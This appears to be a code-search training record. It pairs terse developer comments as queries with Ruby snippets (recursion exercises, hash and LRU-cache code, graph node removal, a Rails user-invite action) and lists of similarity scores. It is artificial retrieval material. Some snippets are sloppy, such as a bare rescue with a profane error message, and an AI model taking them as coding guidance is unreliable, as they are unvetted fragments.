"def factorials_rec(num)\n return [1] if num == 1\n facs = factorials_rec(num - 1)\n facs << facs.last * num\nend",
"def build_tree_rec(preorder, inorder)\n if inorder.length != 0\n original = preorder.shift\n ind = inorder.index(original)\n root = TreeNode.new(inorder[ind])\n root.left = build_tree(preorder, inorder[0...ind])\n root.right = build_tree(preorder, inorder[ind + 1..-1])\n root\n end\nend",
"def recursive_terms(n)\n all_ns << n\n # if we get 1111\n # we have 1111 and should then get 211 and then 31 and then 4\n # then continue from 1111 to 121 then 13\n # then continue from 1111 to 112\n # to find these terms, find the \n next_ns = convert_n_to_next_terms(n)\n next_ns.each do |next_n|\n all_ns << recursive_terms(next_n)\n end\n return all_ns.flatten.uniq\nend",
"def factorials_rec(num)\n answer = []\n return [1] if num == 1\n return [1, 1] if num == 2\n next_num = (num - 1) * factorials_rec(num - 1)[-1]\n answer << next_num\n #answer\nend",
"def factorials_rec(num)\n return [1] if num == 0\n num.times do |num|\n facs = factorials_rec(num-1)\n facs << num * facs.last\n facs\n end\nend",
"def factorials_rec(num)\n return [1,1] if num == 2\n return [1] if num == 1\n\n factorial_array = factorials_rec(num-1)\n factorials = factorial_array + [(num-1) * factorial_array.last]\n factorials\nend",
"def fibonacci2(num)\n a = 0; b = 1\n array = [a,b]\n def inner(a,b,num,array)\n c = a + b\n array += [c]\n if c < num\n array = inner(b,c,num,array)\n end\n return array\n end\n array = inner(a,b,num,array)\n return array\nend",
"def sum_recur(array)\n return 0 if array.length <= 0\n array[0] + sum_recur(array[1..-1])\nend",
"def fib_rec(n)\n return nil if n < 1\n return [1] if n == 1\n return [1, 1] if n == 2\n current = [1, 1]\n recursive = fib_rec(n - 1)\n (recursive.length - 1).times do |el|\n current << recursive[el] + recursive[el + 1]\n end\n current\nend",
"def rec_sum(n)\n if n == 0\n return 0\n else\n return n + rec_sum(n-1)\n end\nend",
"def depth_first(value)\n\tend",
"def generate_parenthesis2(n)\n result = []\n build_parenthesis2(n, result, \"\", 0, 0)\n return result\nend",
"def build_tree(unit, node, level = 0)\r\n return nil if level > @max_depth\r\n \t\r\n unit.next_move(node.current_case).each do |next_case|\r\n next if next_case[0] < 0 || next_case[0] > 7 ||\r\n next_case[1] < 0 || next_case[1] > 7 \r\n \r\n next_node = Node.new(next_case, node)\r\n node.children << next_node\r\n\r\n build_tree(unit, next_node, level + 1)\r\n end \r\n end",
"def fun1 n\n return 0 if n == 1\n return 1 + fun1(n/2)\nend",
"def nesting() end"
] |
[
"0.72534883",
"0.67001754",
"0.6450046",
"0.61399716",
"0.61399716",
"0.59712577",
"0.590705",
"0.5799627",
"0.5787223",
"0.57655096",
"0.57536495",
"0.57430583",
"0.5730778",
"0.5701788",
"0.56930506",
"0.5684765",
"0.5684686",
"0.5677164",
"0.567698",
"0.5671565",
"0.56598455",
"0.56535304",
"0.5652787",
"0.564206",
"0.5638272",
"0.5636645",
"0.5636645",
"0.5627894",
"0.5618619",
"0.56093454",
"0.5603566",
"0.55973285",
"0.5589179",
"0.5588186",
"0.55784076",
"0.5563311",
"0.5525478",
"0.5524059",
"0.552134",
"0.55085504",
"0.5505917",
"0.55052173",
"0.5492141",
"0.5488372",
"0.5478307",
"0.5475567",
"0.54742366",
"0.54594374",
"0.5445712",
"0.5441155",
"0.54400885",
"0.54388094",
"0.54373366",
"0.54297084",
"0.5428705",
"0.5426157",
"0.5409656",
"0.54086465",
"0.5402102",
"0.5400446",
"0.5394886",
"0.53777665",
"0.537266",
"0.5365891",
"0.5361768",
"0.5360814",
"0.534758",
"0.5346475",
"0.5339975",
"0.53371716",
"0.53354454",
"0.53340554",
"0.533159",
"0.53295594",
"0.53283644",
"0.5322253",
"0.5319839",
"0.5319528",
"0.5318399",
"0.5318399",
"0.5318399",
"0.53161085",
"0.5312131",
"0.53119206",
"0.5309884",
"0.53067243",
"0.53012127",
"0.5300306",
"0.53001904",
"0.53000796",
"0.52962613",
"0.52949303",
"0.52909017",
"0.5272853",
"0.5258898",
"0.5257171",
"0.5255685",
"0.52436376",
"0.5237797",
"0.52292514",
"0.52285874"
] |
0.0
|
-1
|
this gives me the willies, but whatever. fix later.
|
def create
#User.transaction.do
email = params[:email]
logger.debug(email)
generated_password = Devise.friendly_token.first(8)
begin
user = User.create!(:email => email, :password => generated_password)
UserMailer.send_welcome_email(self).deliver
flash[:notice] = "Invitation sent."
rescue
flash[:error] = "FUCK."
end
render 'results'
#end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def malts; end",
"def superweening_adorningly(counterstand_pyrenomycetales)\n end",
"def offences_by; end",
"def king_richard_iii; end",
"def low_toms\n [43]\n end",
"def buzzword; end",
"def buzzword; end",
"def romeo_and_juliet; end",
"def anchored; end",
"def hiddens; end",
"def stderrs; end",
"def terpene; end",
"def take_bath\n self.hygiene += 4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n @hygiene\n end",
"def berlioz; end",
"def rubbishness(name)\n name.each_char.map { |x|\n case x\n when /[A-Z]/\n 1\n when '?', '=', '!'\n -2\n else\n 0\n end\n }.inject(&:+) + (name.size / 100.0)\n end",
"def probers; end",
"def take_bath\n self.hygiene += 4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n end",
"def take_bath\n self.hygiene += 4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n end",
"def ninety_nine_bottles_of_beer\nend",
"def ninety_nine_bottles_of_beer\nend",
"def ninety_nine_bottles_of_beer\nend",
"def throw_fierce_lqqks\n 'Here I am, giving you Soviet-Satellite realness'\n end",
"def kids_musical; end",
"def existing_words\n draw_current = draw\n p \"The 7 letters drawn are:\"\n p draw_current\n p \"-\"*70\n\n combinations = combine(draw_current).flat_map{ |w| w.permutation.to_a}.uniq.map { |e| e.join }\n combinations.map{|i| search(i, UPPER_BOUND_INI, LOWER_BOUND_INI, NO_ITERATION_INI)}.flatten.reject{|x| x==nil}\nend",
"def gen_washing\r\r\n end",
"def boatswain\n return self.swabbie unless self.swabbie.nil?\n highval = 0\n self.axe.each do |flotsam|\n counter = self.filibuster(flotsam)\n highval = ((highval <=> counter) == 1) ? highval : counter\n end\n \".#{highval + 1}\"\n end",
"def caveats; nil end",
"def caveats; nil end",
"def jack_handey; end",
"def sharp; accidental; end",
"def in_law; end",
"def blg; end",
"def weber; end",
"def silly_adjective; end",
"def cutoffs\n end",
"def ignores; end",
"def wtfpyra (a)\n\t\tfullpyra (a)\n\t\treversefullpyra (a)\n\tend",
"def whisper_words(words)\nreturn words.map{ |elem| elem.downcase + \"...\"}\nend",
"def tongue_twister; end",
"def broken_bikes\n bikes.select {|bike| bike.broken?}\n end",
"def cracklepop1\n def aux x\n /[A-Z]+/i.match(x.to_s).to_s\n end\n (1..100).map do |i|\n x = i%3==0 ? 'crackle' : i\n i%5==0 ? (aux(x)+'pop') : x\n end\nend",
"def nonstriker_perimartium(pronunciation_crotched)\n end",
"def solve_zero_vs_six_vs_nine\n return if @arr[1].nil? || @arr[4].nil?\n\n #p \"1,4: #{@arr[1]},#{@arr[4]}\"\n\n @words.filter{|x| x.length == 6 && @hash[x].nil?}.each{|w|\n if @arr[4].chars.all?{|c| w.chars.include?(c)}\n solved(9, w)\n elsif @arr[1].chars.all?{|c2| w.chars.include?(c2)}\n solved(0, w)\n else\n solved(6, w)\n end\n }\n end",
"def strip_excess_words(content_player_id)\n\t\tself.played_words.each do |value|\n\t\t\tif value.t != self.t - 1 \n\t\t\t\tvalue.t_l.clear \n\t\t\tend\n\t\tend\t\n\tend",
"def schubert; end",
"def leeway; end",
"def leeway; end",
"def celebration; end",
"def jeweler; end",
"def jeweler; end",
"def jeweler; end",
"def weasley(values)\nweasley = values.map do |entry|\n last_names_only = entry[1].split.last\n if last_names_only == \"Weasley\"\n first_names = entry[1].split.first\n last_names = entry[1].split.last\n puts \"#{first_names.to_s} Badger #{last_names.to_s.chomp}\"\n end\nend\nend",
"def mis_ramos\n\n\tend",
"def who_we_are\r\n end",
"def gounod; end",
"def whisper_words(words)\r\n return words.map { |ele| ele.downcase + \"...\" }\r\nend",
"def wig\n 'I have regular wig.'\n end",
"def mambo_no_5; end",
"def look\n [\"Friends\", \"Dating\", \"A relationship\", \"Networking\", \"Fun\"][self.looking_for - 1]\n end",
"def bellini; end",
"def whisper_words(words)\n\nend",
"def schumann; end",
"def wtf_pyramid\n\n\t# Divide by 2 the number input to build the top of the pyramid\n\t$top = ($etages / 2)\n\n\ti = 1\n\tk = $top\n\tt = k + 5\n\n\t# Construct the pyramid from the top to the bottom\n\ti.upto(k) do t.times do\n\t \t\t\t\t\tprint ' '\n\t \t\t\t\t\t end\n\n\t # Print the *\n\t (2 * i - 1).times do\n\t\t\t\t\t\t print '*'\n\t\t\t\t\t\tend\n\t # Return the line for the next stair\n\t print \"\\n\"\n\n\t t -= 1\n\t i += 1\n\t end\n\n\t# Diff the number of stairs with the result above\n\t$bottom = ($etages - $top)\n\n\ti = $bottom\n\tk = 1\n\tt = 5\n\n\t# Construct the pyramid from the bottom to the top\n\ti.downto(k) do t.times do \n\t\t\t\t\t\t\t\tprint ' ' \n\t\t\t\t\t\t end\n\n\t # Print the *\n\t (2 * i - 1).times do \n\t \t\t\t\t\t\t\tprint '*'\n\t \t\t\t\t\tend\n\t \n\t # Return the line for the next stair\n\t print \"\\n\"\n\n\t t += 1\n\t i -= 1\n\tend\nend",
"def stop_words\n # Words taken from Jonathan Feinberg's cue.language (via jasondavies.com), see lib/cue.language/license.txt.\n \"i|me|my|myself|we|us|our|ours|ourselves|you|your|yours|yourself|yourselves|he|him|his|himself|she|her|hers|herself|it|its|itself|they|them|their|theirs|themselves|what|which|who|whom|whose|this|that|these|those|am|is|are|was|were|be|been|being|have|has|had|having|do|does|did|doing|will|would|should|can|could|ought|im|youre|hes|shes|its|were|theyre|ive|youve|weve|theyve|id|youd|hed|shed|wed|theyd|ill|youll|hell|shell|well|theyll|isnt|arent|wasnt|werent|hasnt|havent|hadnt|doesnt|dont|didnt|wont|wouldnt|shant|shouldnt|cant|cannot|couldnt|mustnt|lets|thats|whos|whats|heres|theres|whens|wheres|whys|hows|a|an|the|and|but|if|or|because|as|until|while|of|at|by|for|with|about|against|between|into|through|during|before|after|above|below|to|from|up|upon|down|in|out|on|off|over|under|again|further|then|once|here|there|when|where|why|how|all|any|both|each|few|more|most|other|some|such|no|nor|not|only|own|same|so|than|too|very|say|says|said|shall\"\nend",
"def strain; end",
"def chondromyxoma(buckshee, uncongenially_chiquitan)\n end",
"def insult_swabbie\n return case self.swab\n when :counter\n self.boatswain\n when :timestamp\n self.coxswain\n else\n \"\"\n end\n end",
"def wagner; end",
"def most_interesting_man_in_the_world; end",
"def take_bath\n #increment hygiene_points by 4\n #return string \"♪ Rub-a-dub just relaxing in the tub ♫\"..\n self.hygiene +=4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n end",
"def witcher; end",
"def mycelial_gristmilling()\n xenopteri_shebang(sectwise_cessor, ungular_pietism)\n end",
"def mitch_hedberg; end",
"def working_bikes\n bikes.reject { |bike| bike.broken? }\n end",
"def does_not_include_badwords\n\n badwords = %w(\n aloha!\n href=\n -online\n 1freewebspace.com\n 4u\n 5gighost.com\n accutane\n adipex\n adultsex\n advicer\n alprazolam\n amoxil\n arcadepages\n arimidex\n associations.missouristate.edu\n ativan\n augmentin\n baccarrat\n baclofen\n beaver\n blackjack\n bllogspot\n blogs.blackmarble.co.uk\n blowjob\n booker\n buspar\n byob\n car-rental-e-site\n car-rentals-e-site\n carisoprodol\n casino\n casinos\n chatroom\n cialis\n cipro\n citalopram\n clomid\n clonazepam\n comment1\n comment2\n comment3\n comment4\n comment5\n comment6\n coolcoolhu\n coolhu\n credit-card-debt\n credit-report-4u\n creditonlinepersonalloans\n cwas\n cyclen\n cyclobenzaprine\n dating-e-site\n day-trading\n debt-consolidation\n debt-consolidation-consultant\n diazepam\n diovan\n discreetordering\n dostinex\n duty-free\n dutyfree\n dvxuser.com\n equityloans\n fanreach.com\n fioricet\n flagyl\n flowers-leading-site\n fosamax\n freenet\n freenet-shopping\n gambling-\n hair-loss\n health-insurancedeals-4u\n hi5.com\n holdem\n holdempoker\n holdemsoftware\n holdemtexasturbowilson\n homeequityloans\n homefinance\n hotel-dealse-site\n hotele-site\n hotelse-site\n hydrocodone\n hyves.mn\n incest\n insurance-quotesdeals-4u\n insurancedeals-4u\n isuzuforums.com\n jestmaster\n jizz\n jrcreations\n kaboodle.com\n kamagra\n klonopin\n lamictal\n lesbian\n levaquin\n levitra\n lezbian\n loans\n lorazepam\n lycos\n macinstruct\n metformin\n metronidazole\n mortgage-4-u\n mortgagequotes\n musicstation\n nojazzfest\n nolvadex\n online-gambling\n onlinegambling-4u\n ottawavalleyag\n ownsthis\n palm-texas-holdem-game\n paxil\n paydal\n penguinforum\n penis\n personalloansbad\n pharmacy\n phenergan\n phentermine\n poker-chip\n porn\n poze\n profiles.friendster.com\n propecia\n proscar\n pussy\n remeron\n rental-car-e-site\n ringtone\n ringtones\n roulette\n shemale\n shoes\n slot-machine\n Staphcillin\n tamiflu\n tegretol\n texas-holdem\n thorcarlson\n top-e-site\n top-site\n toprol\n toradol\n tramadol\n tramodal\n tramodol\n trim-spa\n ultram\n valeofglamorganconservatives\n valium\n viagra\n vibramycin\n vicodin\n vioxx\n voltaren\n vytorin\n xanax\n zantac\n zithromax\n zofran\n zolpidem\n zolus\n )\n badwords.each do |bw|\n if !comment.nil? && comment.downcase.include?(bw) \n errors.add_to_base(\"Comment Rejected\") \n break\n end\n end\n end",
"def three_of_a_kind_better_kicker\n [5.♠, 7.♡, J.♠, J.♣, J.♢]\n end",
"def findrets(rol)\n give = rol.index(\"give\")\n here = rol.index(\"here\")\n return nil unless give\n \n if (here == nil or here < give)\n lastarg = rol.length() -1\n elsif (here > give)\n lastarg = here -1\n end\n (give+2..lastarg).each do |a|\n rol[a].gsub!(/\\W/,'')\n rol[a] = rol[a].to_sym\n end\n return nil if rol[give+2..lastarg].length == 0\n return rol[give+2..lastarg][0] if rol[give+2..lastarg].length == 1\n return rol[give+2..lastarg]\n end",
"def winter_olympics_sport; end",
"def war_sword # todo: check this matches when 5 are bought\n Regexp.new s_to_h(<<-S)\n B1 96 B1 D3 ED AE 5F 92 02 66 03 01 .. FF FF FF\n FF .. .. .. .. 31 19 01 0B 01 00 00 00 10 00 00\n 00 4E 00 00 00 00 00 00 00 01 00 00 00 00 00 00\n 00 02 00 00 00 02 00 00 00 99 32 C5 C4 CC 57 6D\n 43 9F 6B 03 01 FF FF FF FF 99 32 C5 C4 CC 57 6D\n 43 27 9E 00 01 FF FF FF FF 01 00 00 00 99 32 C5\n C4 CC 57 6D 43 27 9E 00 01 FF FF FF FF 13 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00\n 00\n S\nend",
"def work_out\n self.happiness += 2\n self.hygiene -= 3\n return \"♪ another one bites the dust ♫\" \n end",
"def sluggish_octopus(fishes)\r\n biggest_fish = \"\"\r\n\r\n fishes.each_with_index do |fish1, idx1|\r\n fishes.each_with_index do |fish2, idx2|\r\n if idx2 > idx1\r\n if fish2.length > biggest_fish.length\r\n biggest_fish << fish2\r\n end\r\n end\r\n end\r\n end\r\n return biggest_fish\r\nend",
"def strange_words(words)\n i = 0\n new_array = []\n new_string = \"\"\n\n while i < words.length\n\n \tnew_string = words[i]\n\n if (words[i].length < 6 ) && !(new_string[0] == \"e\") || (new_string[0] == \"e\") && !(words[i].length < 6 )\n new_array << words[i] \n end\n i += 1\n end\n return new_array\n\nend",
"def suivre; end",
"def wip\n end",
"def unusual_sport; end",
"def half_wind; end",
"def romeo_and_juliet_quote; end",
"def broken_parts\n page_elements.select { |pe| pe.embeddable.nil? }\n end",
"def folge_berechnen(tn,jahr)\n folge = [ \"\" ]\n ges_einsaetze = \"28.12.#{jahr}\".to_date.cweek\n ger_schalter = 1\n namen = prio_bilden(tn,folge,ges_einsaetze,ger_schalter)\n zaehler = 0\n while folge.size <= ges_einsaetze\n namen.each do |name|\n unless tn[name].find_index(folge.size) || folge.size > ges_einsaetze\n folge << name\n zaehler += 1\n end\n end\n if zaehler == 0\n if namen.size < tn.size && ger_schalter == 1\n ger_schalter = 0\n else\n folge << \"nicht besetzt!\"\n ger_schalter = 1\n end\n end\n zaehler = 0\n namen = prio_bilden(tn,folge,ges_einsaetze,ger_schalter)\n end\n return folge \n end",
"def big_bad; end",
"def half_wind_abbreviation; end",
"def clever_octopus(the_sea)\n longest = the_sea[0]\n\n the_sea.each do |fish|\n if fish.length > longest.length\n longest = fish\n end\n end\n\n longest\nend",
"def ibu; end",
"def whiny; end",
"def functioning_bikes\n bikes.reject {|bike| bike.broken?}\n end",
"def silly_talk(str)\n vows = \"aeiou\"\n\n new_talk = str.split(\" \").map do |wrd|\n if vows.include?(wrd[-1].downcase)\n wrd + wrd[-1]\n else\n silly = wrd.split(\"\").map do |char|\n if vows.include?(char)\n char + \"b\" + char\n else\n char\n end\n end\n silly.join(\"\")\n end\n end\n\n new_talk.join(\" \")\nend",
"def whisper_words(words)\n\twhisper = words.map { |word| word.downcase + \"...\"}\n \treturn whisper\nend",
"def rassoc(p0) end",
"def whisper_words(words)\n\treturn words.map { |word| word.downcase + \"...\" }\nend",
"def Text2Words(txt, len, where, offset)\n txt.each do |words|\n print \" { { \" \n words.each do |word|\n if word==\"ET\" then\n pos = where.index(\"TERTAUQ\")\n else\n pos = where.index(word.reverse) || where.index(word) \n end\n print \" { %3d, %2d }, \" % [pos+offset, word.length ]\n end\n (len - words.length).times do\n print \" { %3d, %2d }, \" % [0, 0 ]\n end\n puts \" } }, // \" + words.join(\" \")\n end\nend",
"def gluck; end"
] |
[
"0.58298665",
"0.5742944",
"0.56979156",
"0.56977946",
"0.5666964",
"0.55777055",
"0.55777055",
"0.55611366",
"0.55526954",
"0.55372494",
"0.5510455",
"0.5493631",
"0.5468806",
"0.54391176",
"0.5425024",
"0.5424866",
"0.54151016",
"0.54151016",
"0.53829825",
"0.53829825",
"0.53829825",
"0.5375268",
"0.5361594",
"0.53563416",
"0.53430897",
"0.5342348",
"0.53342396",
"0.53342396",
"0.5331595",
"0.53149354",
"0.5311532",
"0.5297725",
"0.52942985",
"0.52691066",
"0.52550465",
"0.524625",
"0.5229186",
"0.5221891",
"0.52150154",
"0.5213231",
"0.5202859",
"0.52022105",
"0.5201586",
"0.51987636",
"0.51893723",
"0.5183028",
"0.5183028",
"0.51499015",
"0.51437837",
"0.51437837",
"0.51437837",
"0.5137755",
"0.51375467",
"0.5136649",
"0.5127192",
"0.5126818",
"0.5124088",
"0.51233363",
"0.512196",
"0.51217115",
"0.5120818",
"0.51139116",
"0.5112114",
"0.5106213",
"0.5105473",
"0.5102341",
"0.5088354",
"0.50881684",
"0.50765544",
"0.5073688",
"0.50714856",
"0.50692695",
"0.50680685",
"0.50637406",
"0.50627625",
"0.50618285",
"0.5057631",
"0.50513655",
"0.50463414",
"0.50441456",
"0.5043794",
"0.5038508",
"0.5032629",
"0.50303984",
"0.50278497",
"0.50265944",
"0.5019292",
"0.5018566",
"0.49994367",
"0.4998698",
"0.49924847",
"0.49900314",
"0.49864468",
"0.4986103",
"0.49842623",
"0.49712545",
"0.49696267",
"0.49686947",
"0.49658802",
"0.49641076",
"0.49545425"
] |
0.0
|
-1
|
Storing node in hash to track the working value
|
def assign_node(char)
assigned = false
@worker_obj.each do |k, node|
break if assigned
unless node
@worker_obj[k] = [char, NUM_TO_INT_MAP[char] + ADDITIONAL_SECONDS]
@nodes_being_worked_on << char
assigned = true
end
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def node_hash(node_id)\n \n end",
"def []=(node, value)\n return @hash[node.sha1] = value\n end",
"def hash\n node_id.hash\n end",
"def hash # Hack for Ruby 1.8.6\n @node.id.hash ^ self.class.hash\n end",
"def recalculate_hash_at(node)\n return node._hash = node.value if node.value\n recalculate_hash_at(node.left) if node.left\n recalculate_hash_at(node.right) if node.right\n node._hash = self.class.hash_children(*node_subhashes(node))\n end",
"def calculate_hash!\n prefix = PREFIX_NAME_LOOKUP[self.type]\n # add special cases for refs\n self.hash_id = NodeId.sha1(\"#{prefix} #{self.size}\\0#{self.content}\")\n end",
"def hash\n @hash || @hash = (value.hash * -1)\n end",
"def hash\n @node.sort.push(@edge).hash\n end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def store(key, value)\n mon_synchronize do\n node = (@hash[key] ||= Node.new(key))\n node.value = value\n touch(node)\n compact!\n node.value\n end\n end",
"def root_hash\n self.node_hash root_node_id\n end",
"def update_hash\n nh = nil\n\n if is_branch != 0\n sha512 = OpenSSL::Digest::SHA512.new\n sha512 << HASH_+PREFIXES[:inner_node]\n hashes.each { |k,h|\n sha512 << v\n }\n nh = sha512.digest\n end\n\n return false if nh == self.hash\n self.hash = nh\n return true\n end",
"def hash\n\t\tvalue.hash\n\tend",
"def correct_node_hash(node_id)\n SpStore::Crypto.hash_for_tree_node node_id, node_hash(left_child(node_id)),\n node_hash(right_child(node_id))\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def [](node)\n return @hash[node.sha1]\n end",
"def roothash\n root_node._hash || recalculate_hash_at(root_node)\n end",
"def hash\n 0\n end",
"def hash\n value.hash\n end",
"def serializable_hash\n @node = links.any? ? super.merge(_links: links) : super\n end",
"def hash(key); end",
"def put key, value\n\t\t\t# if the key already exists, \n\t\t\tif @my_hash.has_key? key\n\t\t\t\t@my_hash[key].value = value\n\t\t\telse\n\t\t\t\t# if the list is full, remove the last node to create one spot for a new one\n\t\t\t\tif @my_hash.length == @max_size\n\t\t\t\t\tdeleted_key = @my_list.remove_last\n\t\t\t\t\t@my_hash.delete deleted_key\n\t\t\t\tend\n\t\t\t\t# create a new node in the list\n\t\t\t\t# store this node in the hash\n\t\t\t\tif @my_hash.length < @max_size\n\t\t\t\t\t@my_hash[key] = @my_list.add_to_first key, value\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn @my_hash\n\t\tend",
"def hash\n @value.hash\n end",
"def hash\r\n @_hash ||= _hash\r\n end",
"def hash\n self.state.hash\n end",
"def hash\n end",
"def hash\n end",
"def hash\n end",
"def hash()\n #This is a stub, used for indexing\n end",
"def hash\n value_id.hash\n end",
"def get key\n\t\t\tif @my_hash.has_key? key\n\t\t\t\tnode = @my_hash[key]\n\t\t\t\t@my_list.promote_node node\n\t\t\t\tnode.value\n\t\t\telse\n\t\t\t\tnil\n\t\t\tend\n\t\tend",
"def hash\n [value].hash\n end",
"def hash\n [value].hash\n end",
"def initialize\n @nodes_hash = Hash.new\n end",
"def hash(*) end",
"def hash\n state.hash\n end",
"def hash\n state.hash\n end",
"def change(hash); end",
"def hash\n type.hash ^ (id.hash >> 1)\n end",
"def hash_code; end",
"def hash\n @hash || calculate_hash!\n end",
"def hash\n @hash\n end",
"def set(item, node)\n\t\t\t@hash[item] = node\n\t\tend",
"def update_node!(node)\n @store.remove(node.key)\n @store.append(node.key, node.val)\n end",
"def store(calling_node, key, value)\n @router.touch(calling_node)\n return false unless key.class == DataKey\n @values[key.to_bin] = value\n return true\n end",
"def rehash() end",
"def hash\n num = @high << 64\n num |= @low\n num.hash\n end",
"def set(key, value)\n @semaphore.synchronize do\n node = Node.new(key, value)\n return false if value.value.length > @max_bytes\n\n if empty?\n @head_node = node\n @tail_node = node\n @hashed_storage[key] = node\n return node\n end\n while value.value.length + used_bytes > @max_bytes\n @hashed_storage.delete(@head_node.key)\n @head_node = @head_node.previous_node\n @head_node.next_node = nil if @head_node \n end\n node.next_node = @tail_node\n @tail_node.previous_node = node\n @tail_node = node\n @hashed_storage[key] = node\n end\n value\n end",
"def geohash(key, member); end",
"def hash=(_arg0); end",
"def add(item)\n\t\t\t@hash[item] = Node.new\n\t\tend",
"def hash\n element.hash\n end",
"def hash\r\n id.hash\r\n end",
"def save_hashes\n @storage.save_hash_tree @hash_tree_controller.node_hashes\n end",
"def serializable_hash\n return nil if @object.nil?\n @node = attributes\n include_links!\n # include_associations! if _embed\n @node\n end",
"def add_node(key, val)\n @store.append(key, val)\n end",
"def hash\n @hash.hash\n end",
"def hash\n [_hash, name, owner].hash\n end",
"def hash\n h = @e.nil? ? 0 : @e\n h = (h << 1) ^ @r.hash\n h = (h << 1) ^ @v.hash\n end",
"def root_hash\n self[1]\n end",
"def hash\n self.class.hash ^ @ns.hash\n end",
"def hash\n\t\t\t@path.hash\n\t\tend",
"def node_hash_from_node(ast)\n hash = {}\n ast.children.each { |cn| hash[cn.children[0]] = cn.children[1] }\n hash\n end",
"def hash\n -element.hash\n end",
"def node_to_hash(node)\n puts \"You must define a `node_to_hash` method in your child class to parse the Nokogiri nodes\"\n end",
"def hash\n @symbols.hash + 37*positive?.hash\n end",
"def hash\n super ^ number.hash\n end",
"def test_equal_hash\n chain = \"Person1<Person2(360):Person3<Person4(930)\"\n block = Blockchain.new(0,0,chain, 1.5,\"ch77\")\n block.setHash(\"ch77\")\n\n assert_equal(1, block.check_curr())\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def to_hash\n call\n @hash = @value\n @hash\n end",
"def hash\n @id.hash\n end",
"def hash_id\n @hid\n end",
"def hash\n self.class.hash ^ operand.hash\n end",
"def add(hash); end",
"def hash()\n #This is a stub, used for indexing\nend",
"def hash\n @vbits.hash\n end",
"def hash\n @hash ||= self.to_a.hash\n end",
"def add_node(node)\n nodes[node.value] = node\n end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash\n size.hash ^ rank.hash\n end",
"def []=(key, value)\n root_node._hash = nil # reset pre-calculated roothash\n node = root_node\n ba_key = Bitarray.new(key)\n\n # finds or creates the node\n 1.upto(KEY_SIZE) do |depth|\n bit = ba_key[depth - 1]\n node =\n if bit == 0\n # 0, descend left\n node.left ||= (node.left = Node.new(key, depth))\n else\n # 1, descend right\n node.right ||= (node.right = Node.new(key, depth))\n end\n end\n node.value = value\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end"
] |
[
"0.73474973",
"0.729175",
"0.72454065",
"0.7098122",
"0.68676984",
"0.6843846",
"0.6769423",
"0.6703186",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.65726817",
"0.6541691",
"0.6469588",
"0.64603823",
"0.6431214",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6367511",
"0.6341428",
"0.63392353",
"0.6325385",
"0.63023704",
"0.62718755",
"0.62471735",
"0.6244659",
"0.6231332",
"0.6217329",
"0.61970747",
"0.61970747",
"0.61970747",
"0.6187663",
"0.6172414",
"0.61602473",
"0.6155317",
"0.6155317",
"0.6145848",
"0.61347663",
"0.6132625",
"0.6132625",
"0.61286306",
"0.61113954",
"0.6090848",
"0.60648316",
"0.6058776",
"0.60501826",
"0.60396606",
"0.60129464",
"0.59932005",
"0.598771",
"0.5982686",
"0.5965857",
"0.5941219",
"0.5936024",
"0.59357345",
"0.5925525",
"0.59184563",
"0.5902275",
"0.5900883",
"0.5892239",
"0.5888436",
"0.58564436",
"0.5853809",
"0.58361727",
"0.5833578",
"0.5830824",
"0.58297795",
"0.58131236",
"0.581228",
"0.5801524",
"0.5793647",
"0.5792787",
"0.5792787",
"0.5792787",
"0.57915574",
"0.5784893",
"0.57825977",
"0.57765317",
"0.5776304",
"0.5776069",
"0.57702327",
"0.57686394",
"0.57683176",
"0.57674164",
"0.57674164",
"0.5757451",
"0.5745413",
"0.57442605",
"0.57442605"
] |
0.0
|
-1
|
removing all stored nodes and edges with this node for a particular node
|
def remove_node(node)
@nodes_being_worked_on.delete(node)
@nodes.delete(node)
# the last edge keeps getting ignored when you remove this, so handling the final case
assign_node(@edges[0][1]) if @edges.size == 1
@edges.reject! { |edge| edge.include?(node) }
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def remove(node)\n node.inputs.each do |producer_edge|\n producer_edge.from.outputs.reject! { |edge| edge.to == node }\n end\n\n node.outputs.each do |consumer_edge|\n consumer_edge.to.inputs.reject! { |edge| edge.from == node }\n end\n\n nodes.delete(node)\n end",
"def remove_node_if\n #_clear_cache #done in clear_node(node)\n all = self.nodes\n all.each do |node|\n if yield node then\n self.clear_node(node)\n @pathway.graph.delete(node)\n end\n end\n self\n end",
